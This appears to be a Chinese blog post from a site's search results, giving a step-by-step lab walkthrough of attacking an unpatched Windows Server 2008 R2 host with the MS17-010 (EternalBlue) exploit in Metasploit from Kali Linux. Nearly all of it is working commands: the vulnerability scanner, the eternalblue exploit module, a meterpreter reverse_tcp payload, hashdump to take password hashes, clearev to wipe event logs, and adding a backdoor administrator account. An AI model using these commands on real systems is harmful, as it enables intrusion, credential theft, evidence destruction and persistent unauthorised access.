搜索到
1
篇与
攻防
的结果
-
利用MS17_010(永恒之蓝)漏洞攻击windows系统 实验环境攻击机 Kali Linux:192.168.48.128靶机 Windows Server 2008 R2 x64:192.168.48.129{callout color="#ff0000"}靶机需关闭防火墙并且没打永恒之蓝补丁{/callout}攻击过程{mtitle title="获取靶机和攻击机的IP地址"/}{tabs}{tabs-pane label="win2008"}命令:ipconfig{/tabs-pane}{tabs-pane label="kali"}命令:ifconfig{/tabs-pane}{/tabs}{mtitle title="利用MS17_010漏洞"/}验证漏洞是否存在1.启用msfconsole{callout color="#f0ad4e"}命令:msfconsole{/callout}2.搜索漏洞模块{callout color="#f0ad4e"}命令:search ms17_010{/callout}3.利用验证模块{callout color="#f0ad4e"}命令:use auxiliary/scanner/smb/smb_ms17_010{/callout}4.配置验证模块{callout color="#f0ad4e"}命令:options/show options{/callout}对yes的进行配置{callout color="#f0ad4e"}yes(必须配置),no(不一定要配置){/callout}{callout color="#f0ad4e"}命令:set rhost 192.168.48.129{/callout}5.进行验证靶机{callout color="#f0ad4e"}命令:run{/callout}进行渗透攻击{callout color="#f0ad4e"}输入back命令返回msf5命令行{/callout}1.利用攻击模块{callout color="#f0ad4e"}命令:use exploit/windows/smb/ms17_010_eternalblue{/callout}2.配置攻击模块{callout color="#f0ad4e"}命令:options{/callout}{callout color="#f0ad4e"}命令:set rhost 192.168.48.129{/callout}3.发起攻击{callout color="#f0ad4e"}命令:run{/callout}4.尝试获取在攻击机上获取靶机ip地址植入后门{callout color="#f0ad4e"}输入back命令返回{/callout}1.使用meterpreter模块set payload windows/x64/meterpreter/reverse_tcp run2.模块使用查看靶机系统信息:sysinfo获得靶机用户密码:hashdump捕捉靶机屏幕:screenhot清除靶机日志:clearev3.shell命令:shell创建windows用户命令:net user hacker hacker123456 /add将创建的用户加入到管理员组命令:net localgroup administrators hacker /add
